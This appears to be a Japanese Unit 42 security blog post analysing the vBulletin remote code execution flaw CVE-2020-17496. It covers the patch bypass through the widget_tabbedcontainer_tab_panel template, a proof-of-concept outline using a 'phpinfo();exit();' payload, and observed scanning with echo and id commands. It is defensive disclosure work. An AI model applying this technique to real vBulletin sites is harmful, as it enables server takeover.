{"id":108703,"date":"2020-09-03T23:32:50","date_gmt":"2020-09-04T06:32:50","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=108703"},"modified":"2020-09-04T00:30:17","modified_gmt":"2020-09-04T07:30:17","slug":"cve-2020-17496","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/","title":{"rendered":"\u5b9f\u969b\u306e\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bvBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c(RCE)\u8106\u5f31\u6027CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8"},"content":{"rendered":"

\u6982\u8981<\/strong><\/h2>\n

2019\u5e749\u6708\u306b\u3001\u4eba\u6c17\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2vBulletin\u306b\u898b\u3064\u304b\u3063\u305f\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\uff08RCE\uff09\u8106\u5f31\u6027CVE-2019-16759<\/a>\u304c\u516c\u8868\u3055\u308c\u307e\u3057\u305f\u3002\u5f53\u6642\u306eUnit 42\u306e\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f\u5f53\u8a72vBulletin\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u30d6\u30ed\u30b0\u8a18\u4e8b<\/a>\u3092\u516c\u958b\u3057\u3001\u8106\u5f31\u6027\u306e\u6839\u672c\u7684\u8981\u56e0\u3068\u5b9f\u969b\u306b\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u4e0a\u3067\u898b\u3064\u304b\u3063\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u3064\u3044\u3066\u5206\u6790\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u8106\u5f31\u6027\u304c\u60aa\u7528\u3055\u308c\u308b\u3068\u3001\u30d0\u30fc\u30b8\u30e7\u30f35.0.0\u304b\u30895.5.4\u307e\u3067\u306evBulletin\u3092\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30b5\u30fc\u30d0\u30fc\u3067\u653b\u6483\u8005\u306b\u7279\u6a29\u30a2\u30af\u30bb\u30b9\u3068\u5236\u5fa1\u3092\u53d6\u5f97\u3055\u308c\u3001\u7d44\u7e54\u304c\u81ea\u793e\u30b5\u30a4\u30c8\u304b\u3089\u7de0\u3081\u51fa\u3055\u308c\u3066\u3057\u307e\u3046\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n

\u6700\u8fd1\u3001Unit 42\u306e\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f\u3001vBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\uff08RCE\uff09\u8106\u5f31\u6027CVE-2020-17496<\/a>\u3092\u5229\u7528\u3057\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u5f53\u8a72\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u4ee5\u524d\u306e\u8106\u5f31\u6027CVE-2019-16759\u306e\u4fee\u6b63\u3092\u56de\u907f\u3059\u308b\u3082\u306e\u3067\u3001\u653b\u6483\u8005\u304c\u6307\u5b9a\u3055\u308c\u305f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d\u3068\u60aa\u610f\u306e\u3042\u308bPHP\u30b3\u30fc\u30c9\u3092\u4f7f\u3044\u3001\u5de7\u5999\u306b\u7d30\u5de5\u3057\u305fHTTP\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u9001\u4fe1\u3059\u308b\u3053\u3068\u3067\u3001\u30ea\u30e2\u30fc\u30c8\u304b\u3089\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3067\u304d\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u8457\u540d\u4f01\u696d\u30fb\u7d44\u7e54\u306e\u30d5\u30a9\u30fc\u30e9\u30e0\u3092\u542b\u308110\u4e07\u4ef6\u4ee5\u4e0a\u306e\u30b5\u30a4\u30c8<\/a>\u304cvBulletin\u30d9\u30fc\u30b9\u3067\u69cb\u7bc9\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304b\u3089\u3001\u305f\u3060\u3061\u306b\u30d1\u30c3\u30c1\u3092\u9069\u7528\u3059\u308b\u3053\u3068\u304c\u4e0d\u53ef\u6b20\u3067\u3059\u3002<\/p>\n

\u672c\u7a3f\u3067\u306f\u3001\u540c\u8106\u5f31\u6027\u306e\u30d1\u30c3\u30c1\u56de\u907f\u306b\u95a2\u3059\u308b\u8a73\u7d30\u3001\u8106\u5f31\u6027\u3092\u5b9f\u8a3c\u3059\u308b\u6982\u5ff5\u5b9f\u8a3c\u30b3\u30fc\u30c9\uff08PoC\uff09\u3001\u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308b\u653b\u6483\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002<\/p>\n

\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u88fd\u54c1\u3092\u3054\u5229\u7528\u4e2d\u306e\u304a\u5ba2\u69d8\u306f\u3001\u8105\u5a01\u9632\u5fa1<\/a>\u306e\u30b7\u30b0\u30cd\u30c1\u30e3\u3068\u95a2\u9023C2\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u30d6\u30ed\u30c3\u30af\u3059\u308bURL\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0<\/a>\u306e\u5404\u30b5\u30fc\u30d3\u30b9\u3001\u88fd\u54c1\u306b\u3088\u308a\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n

\u8106\u5f31\u6027\u306e\u6839\u672c\u539f\u56e0\u5206\u6790\uff08CVE-2020-17496\uff09<\/strong><\/h2>\n

\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8 \u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u306f\u3001XML\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092PHP\u30b3\u30fc\u30c9\u306b\u5909\u63db\u3057\u3066\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308bvBulletin\u306e\u6a5f\u80fd\u3067\u3001\u30d0\u30fc\u30b8\u30e7\u30f35.0\u4ee5\u964d\u306evBulletin\u306f\u3001\u3053\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3068\u3057\u3066Ajax\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u53d7\u3051\u5165\u308c\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3057\u305f\u3002\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3092\u884c\u3046\u306e\u306fstaticRenderAjax<\/span>\u3068\u3044\u3046\u95a2\u6570\u3067\u3001\u56f31\u306b\u793a\u3059\u3088\u3046\u306b\u3001staticRenderAjax<\/span>\u95a2\u6570\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u306e\u5024\u306f$_REQUESTS\u3001<\/span>$_GET<\/span>\u3001$_POST<\/span>\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u3057\u305f\u304c\u3063\u3066\u3001\u3053\u308c\u3089\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u304b\u3089\u53d6\u5f97\u3055\u308c\u305f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d\u3068\u3001\u95a2\u9023\u306e\u8a2d\u5b9a\u5185\u5bb9\u306f\u30e6\u30fc\u30b6\u30fc\u306e\u5236\u5fa1\u4e0b\u306b\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u304c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027CVE-2019-16759\u306b\u3064\u306a\u304c\u308a\u307e\u3059\u3002<\/p>\n

\"staticRenderAjax\u95a2\u6570\u306e\u5024\u3068\u30d1\u30e9\u30e1\u30fc\u30bf\u306f\u3001\u8d64\u3044\u77e2\u5370\u3067\u793a\u3059\u3088\u3046\u306b\u3001$_
\u56f3 1 vBulletin 5.5.5 \u672a\u6e80\u306e callRender()<\/figcaption><\/figure>\n

\u3053\u3053\u3067\u653b\u6483\u8005\u304c\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540dwidget_php<\/span>\u3092\u542b\u3080Ajax\u30ea\u30af\u30a8\u30b9\u30c8\u306b\u7d30\u5de5\u3092\u3057\u3001widgetConfig['code']<\/span>\u00a0\u30d1\u30e9\u30e1\u30fc\u30bf\u5185\u306b\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u3092\u914d\u7f6e\u3057\u305f\u5834\u5408\u3001\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0 \u30a8\u30f3\u30b8\u30f3\u306f\u305d\u306ewidget_php <\/span>XML\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092PHP\u30b3\u30fc\u30c9\u306e\u6587\u5b57\u5217\u306b\u5909\u63db\u3057\u307e\u3059\uff08\u56f32\u53c2\u7167)\u3002\u305d\u306e\u5f8c\u5909\u63db\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306feval<\/span>\u95a2\u6570\uff08\u56f33\u306b\u30cf\u30a4\u30e9\u30a4\u30c8\u8868\u793a)\u3092\u4ecb\u3057\u3066\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u751f\u6210\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306b\u306fvB5_Template_Runtime::evalPhp(\" . $widgetConfig['code'] . \")<\/span>\u00a0\u3068\u3044\u3046\u884c\u304c\u3042\u308b\u3053\u3068\u304b\u3089\u3001\u3053\u308c\u3067\u30ea\u30af\u30a8\u30b9\u30c8\u5185\u306e\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u3066\u3057\u307e\u3046\u3053\u3068\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n

\"\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540dwidget_php\u3068\u30d1\u30e9\u30e1\u30fc\u30bfwidgetConfig
\u56f3 2 widget_php\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8<\/figcaption><\/figure>\n
$final_rendered = \" . \";\r\n\r\nif (empty($widgetConfig) AND !empty($widgetinstanceid))\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . \"; $widgetConfig = vB5_Template_Runtime::parseData('widget', 'fetchConfig', $widgetinstanceid);\r\n\r\n$final_rendered .= \" . ' ';\r\n\r\n}\r\n\r\nelse {\r\n\r\n$final_rendered .= \";\r\n\r\n}\r\n\r\n$final_rendered .= \" . ' ' . \";\r\n\r\nif (!empty($widgetConfig))\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . \";\r\n\r\n$widgetid = $widgetConfig['widgetid'];\r\n\r\n$final_rendered .= \" . ' ' . \";\r\n\r\n$widgetinstanceid = $widgetConfig['widgetinstanceid'];\r\n\r\n$final_rendered .= \" . ' ';\r\n\r\n}\r\n\r\nelse\r\n\r\n{\r\n\r\n$final_rendered .= \";\r\n\r\n}\r\n\r\n$final_rendered .= \" . ' ' . vB5_Template_Runtime::includeTemplate('module_title',array('widgetConfig' => $widgetConfig, 'show_title_divider' => 'l', 'can_use_sitebuilder' => $user['can_use_sitebuilder'])) . ' ' . \";\r\n\r\nif (!empty($widgetConfig['code']) AND !vB::getDatastore()->getOption('disable_php_rendering'))\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . \" . ' ' . vB5_Template_Runtime::evalPhp(\" . $widgetConfig['code'] . \") . ' ';\r\n\r\n}\r\n\r\nelse\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . \";\r\n\r\nif ($user['can_use_sitebuilder'])\r\n\r\n{ $final_rendered .= ' ' . vB5_Template_Runtime::parsePhrase(\"click_edit_to_config_module\") . ' ';\r\n\r\n}\r\n\r\nelse\r\n\r\n{\r\n\r\n$final_rendered .= \";\r\n\r\n}\r\n\r\n$final_rendered .= \" . ' ';\r\n\r\n}\r\n\r\n$final_rendered .= \" . ' ';<\/pre>\n
 <\/p>\n
\"\u8d64\u3044\u30dc\u30c3\u30af\u30b9\u3067\u95a2\u6570eval($templateCode)\u3092\u30cf\u30a4\u30e9\u30a4\u30c8\u8868\u793a\u3057\u3066\u3044\u307e\u3059\"
\u56f3 3 XML\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304b\u3089\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3055\u308c\u305fPHP\u30b3\u30fc\u30c9\u3092eval\u95a2\u6570\u3067\u8a55\u4fa1\u3057\u3066\u3044\u308b<\/figcaption><\/figure>\n
\u30d0\u30fc\u30b8\u30e7\u30f35.5.5\u4ee5\u964d\u3001CVE-2019-16759\u306e\u4fee\u6b63\u304ccallRender()<\/span>\u95a2\u6570\u306b\u5c0e\u5165\u3055\u308c\u307e\u3057\u305f\uff08\u56f34\u53c2\u7167\uff09\u3002\u3053\u306e\u4fee\u6b63\u3067\u306f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u306e\u306b\u7981\u6b62\u30ea\u30b9\u30c8\u306e\u3057\u304f\u307f\u3092\u5229\u7528\u3057\u3066\u3044\u3066\u3001\u540d\u524d\u304cwidget_php<\/span>\u3067\u3042\u308c\u3070XML\u30a8\u30f3\u30b8\u30f3\u306f\u30ea\u30af\u30a8\u30b9\u30c8\u3055\u308c\u305f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3057\u307e\u305b\u3093\u3002<\/p>\n
\"\u30d0\u30fc\u30b8\u30e7\u30f35.5.5\u4ee5\u964d\u3001CVE-2019-16759\u306e\u4fee\u6b63\u304c<s0>callRender()<\/s0>\u95a2\u6570\u306b\u5c0e\u5165\u3055\u308c\u307e\u3057\u305f\uff08\u56f34\u53c2\u7167\uff09\u3002\"
\u56f3 4 vBulletin 5.5.5 \u4ee5\u964d\u306e callRender()<\/figcaption><\/figure>\n
\u3053\u308c\u3068\u306f\u5225\u306e\u4fee\u6b63\u3082\u3042\u308a\u3001\u305d\u3061\u3089\u306e\u4fee\u6b63\u3067\u306fevalPhp\u95a2\u6570\u304c\u73fe\u5728\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u3088\u3046\u306b\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u3061\u3089\u306e\u4fee\u6b63\u3067\u3001widget_php<\/span>\u304cPHP\u30b3\u30fc\u30c9\u5b9f\u884c\u306b\u4f7f\u7528\u3067\u304d\u308b\u552f\u4e00\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306b\u306a\u308a\u307e\u3057\u305f\uff08\u56f35\u53c2\u7167\uff09\u3002<\/p>\n
\"\u8d64\u3044\u30dc\u30c3\u30af\u30b9\u5185\u306e\u30b3\u30fc\u30c9\u306f\u3001if
\u56f3 5 evalPhp() \u304c\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3059\u308b\u306e\u306f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304c widget_php \u306e\u5834\u5408\u306e\u307f<\/figcaption><\/figure>\n
\u5148\u306ewidget_php<\/span>\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3078\u306e\u30e6\u30fc\u30b6\u30fc\u30a2\u30af\u30bb\u30b9\u5236\u9650\u306b\u304f\u308f\u3048\u3001\u3053\u306e\u4fee\u6b63\u3067\u306f\u540c\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092PHP\u30b3\u30fc\u30c9\u5b9f\u884c\u306b\u5229\u7528\u3067\u304d\u308b\u552f\u4e00\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306b\u3057\u3066\u3044\u307e\u3059\u3002\u3068\u3053\u308d\u304c\u3001\u76f4\u8fd1\u3067\u898b\u3064\u304b\u3063\u305f\u4fee\u6b63\u56de\u907f\u65b9\u6cd5\u3067\u306f\u3001\u5225\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u4f7f\u7528\u3059\u308c\u3070\u3053\u306ewidget_php\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ed\u30fc\u30c9\u3067\u304d\u3066\u3057\u307e\u3046\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u305d\u306e\u5225\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3068\u3044\u3046\u306e\u304cwidget_tabbedcontainer_tab_panel<\/span>\u3067\u3059\u3002<\/p>\n
\"This
\u56f3 6 widget_tabbedcontainer_tab_panel \u30c6\u30f3\u30d7\u30ec\u30fc\u30c8<\/figcaption><\/figure>\n
\u4e0a\u306e\u56f36\u306b\u793a\u3059\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8widget_tabbedcontainer_tab_panel<\/span>\u3092\u4f7f\u3048\u3070\u3001\u8907\u6570\u306e\u5b50\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u81ea\u4f53\u3092\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3057\u3066\u3082\u76f4\u63a5\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u306b\u3064\u306a\u304c\u308b\u308f\u3051\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u304c\u3001\u3053\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3059\u308b\u3068\u3001\u5b50\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306e\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u304c\u30c8\u30ea\u30ac\u30fc\u3055\u308c\u307e\u3059\u3002<\/p>\n
\u4ee5\u4e0b\u306e\u30b3\u30fc\u30c9\u306fXML\u5185\u306ewidget_tabbedcontainer_tab_panel<\/span>\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304b\u3089\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3055\u308c\u305fPHP\u30b3\u30fc\u30c9\u3067\u3059\u3002\u30b3\u30fc\u30c9\u306f\u751f\u6210\u5f8c\u306b\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n
$final_rendered = \" . \";\r\n\r\n$panel_id = \" . vB5_Template_Runtime::vBVar($id_prefix).vB5_Template_Runtime::vBVar($tab_num) . \";\r\n\r\n$final_rendered .= \" . \" . \" . ' ' . \";\r\n\r\nif (isset($subWidgets) AND (is_array($subWidgets) OR $subWidgets instanceof ArrayAccess))\r\n\r\n{\r\n\r\nforeach ($subWidgets AS $subWidget)\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . vB5_Template_Runtime::includeTemplate($subWidget['template'],array('widgetConfig' => $subWidget['config'], 'widgetinstanceid' => $subWidget['widgetinstanceid'], 'widgettitle' => $subWidget['title'], 'tabbedContainerSubModules' => $subWidget['tabbedContainerSubModules'], 'product' => $subWidget['product'])) . ' ';\r\n\r\n}\r\n\r\n}$final_rendered .= \" . '';<\/pre>\n
\u3053\u306ePHP\u30b3\u30fc\u30c9\u3067\u306f\u3001\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u30a8\u30f3\u30b8\u30f3\u304c$subWidgets<\/span>\u304b\u3089\u300csubWidget\u300d\u3068\u305d\u306e\u8a2d\u5b9a\u3092\u30c8\u30e9\u30d0\u30fc\u30b9\u3057\u3066\u65b0\u3057\u3044\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u306b\u3088\u308aPHP\u30b3\u30fc\u30c9\u304c\u751f\u6210\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u4f8b\u3067\u306f\u6587\u5b57\u5217widget_php<\/span>\u304csubWidget<\/span>\u5909\u6570\u306b\u5272\u308a\u5f53\u3066\u3089\u308c\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c$widgetConfig['code']<\/span>\u00a0\u306b\u914d\u7f6e\u3055\u308c\u3066\u3044\u3066\u3001\u3053\u308c\u304cCVE-2019-16759\u3068\u540c\u69d8\u306b\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n
PoC\uff08\u6982\u5ff5\u5b9f\u8a3c\u30b3\u30fc\u30c9\uff09<\/strong><\/h2>\n
\u4ee5\u4e0a\u306e\u5206\u6790\u304b\u3089\u3001\u5b9f\u969b\u306b\u6a5f\u80fd\u3059\u308b\u3053\u3068\u3092\u8a3c\u660e\u3059\u308b\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30b3\u30fc\u30c9\u3092\u4f5c\u6210\u3067\u304d\u307e\u3059\u3002callRender<\/span>\u95a2\u6570\u306e\u547c\u3073\u51fa\u3057\u306b\u306f\u3001POST HTTP\u30e1\u30bd\u30c3\u30c9\u304c\u5fc5\u8981\u3067\u3059\uff08\u56f37\u53c2\u7167\uff09\u3002<\/p>\n
\"\u8d64\u3044\u30dc\u30c3\u30af\u30b9\u3067\u5f37\u8abf\u8868\u793a\u3055\u308c\u3066\u3044\u308b\u30b3\u30fc\u30c9\u306f\u3001\u95a2\u6570callRender\u3092\u547c\u3073\u51fa\u3059\u305f\u3081\u306bPOST
\u56f3 7 callRender()\u306e\u547c\u3073\u51fa\u3057<\/figcaption><\/figure>\n
\u56f38\u306fphpinfo()<\/span>\u30b3\u30fc\u30c9\u306e\u5b9f\u884c\u7d50\u679c\u3092\u542b\u3080\u4fb5\u5bb3\u3055\u308c\u305f\u30da\u30fc\u30b8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\uff08\u30ea\u30af\u30a8\u30b9\u30c8\u60c5\u5831\u3042\u308a\uff09\u3002\u56f39\u3068\u56f310\u3082\u305d\u308c\u3068\u306f\u307e\u305f\u5225\u306e\u7d30\u5de5\u6e08\u307f\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u5b9f\u884c\u3057\u305f\u5834\u5408\u306b\u540c\u3058\u52b9\u679c\u304c\u5f97\u3089\u308c\u308b\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n
URL\u3067\u306f\u3001\u5b50\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540dwidget_php<\/span>\u3068\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9phpinfo();exit();<\/span>\u00a0\u306f\u914d\u5217subWidget<\/span>\u306e\u6700\u521d\u306e\u8981\u7d20\u3068\u3057\u3066\u5b58\u5728\u3057\u3066\u3044\u307e\u3059\u3002\u30d0\u30c3\u30af\u30a8\u30f3\u30c9\u304c\u3053\u306eURL\u3092\u51e6\u7406\u3059\u308b\u3068\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n
\"\u3053\u306e\u4fb5\u5bb3\u3055\u308c\u305f\u30da\u30fc\u30b8\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u6982\u5ff5\u5b9f\u8a3c\u306e\u4e00\u90e8\u3067\u3001phpinfo()\u30b3\u30fc\u30c9\u306e\u7d50\u679c\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\uff08\u30ea\u30af\u30a8\u30b9\u30c8\u60c5\u5831\u4ed8\u304d\uff09\u3002\"
\u56f3 8 \u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u518d\u73fe\u691c\u8a3c 1<\/figcaption><\/figure>\n
\"\u3053\u308c\u3082\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u6982\u5ff5\u5b9f\u8a3c\u306e\u4e00\u90e8\u3067\u3001\u307e\u305f\u5225\u306e\u7d30\u5de5\u3055\u308c\u305f\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\"
\u56f3 9 \u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u518d\u73fe\u691c\u8a3c 2<\/figcaption><\/figure>\n
\"\u3053\u308c\u306f\u3001CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u6982\u5ff5\u5b9f\u8a3c\u306e\u4e00\u90e8\u3067\u30013\u756a\u76ee\u306e\u7d30\u5de5\u3055\u308c\u305f\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\"
\u56f3 10. \u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u518d\u73fe\u691c\u8a3c 3<\/figcaption><\/figure>\n
\u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bCVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8<\/strong><\/h2>\n
\u79c1\u305f\u3061\u306f2020\u5e748\u670810\u65e5\u306bCVE-2020-17496\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3059\u308b\u6700\u521d\u306e\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u3092\u691c\u51fa\u3057\u307e\u3057\u305f\u3002\u305d\u306e\u5f8c\u3082\u7570\u306a\u308bIP\u30a2\u30c9\u30ec\u30b9\u304b\u3089\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u8a66\u307f\u304c\u9032\u884c\u4e2d\u3067\u3042\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u305f\u3060\u3057\u3053\u308c\u3089\u306f\u305d\u308c\u305e\u308c\u5225\u500b\u306e\u653b\u6483\u3067\u3042\u3063\u3066\u7279\u5b9a\u653b\u6483\u8005\u306b\u3088\u308b\u5354\u8abf\u7684\u53d6\u308a\u7d44\u307f\u3067\u306f\u306a\u3044\u70b9\u306b\u3054\u6ce8\u610f\u304f\u3060\u3055\u3044\u3002<\/p>\n
\u30b9\u30ad\u30e3\u30f3\u6d3b\u52d5<\/span><\/h4>\n
\u79c1\u305f\u3061\u304c\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u305f\u60aa\u610f\u306e\u3042\u308b\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u306f\u3001\u30b9\u30ad\u30e3\u30f3\u6d3b\u52d5\u3092\u884c\u3046\u30bd\u30fc\u30b9\u304c\u8907\u6570\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u3063\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30b9\u30ad\u30e3\u30f3\u306f\u3001\u8106\u5f31\u306a\u30b5\u30a4\u30c8\u3092\u898b\u3064\u3051\u3066\u95a2\u9023\u60c5\u5831\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u304a\u308a\u3001\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u306e\u521d\u671f\u6bb5\u968e\u306b\u3042\u305f\u308a\u307e\u3059\u3002\u305d\u306e\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u56f311\u304b\u3089\u56f315\u306b\u793a\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u30b3\u30de\u30f3\u30c9\u306eecho<\/span>\u3068id<\/span>\u3092\u5b9f\u884c\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u304b\u3089\u653b\u6483\u8005\u306f\u30bf\u30fc\u30b2\u30c3\u30c8\u304c\u8106\u5f31\u304b\u3069\u3046\u304b\u3092\u77e5\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n
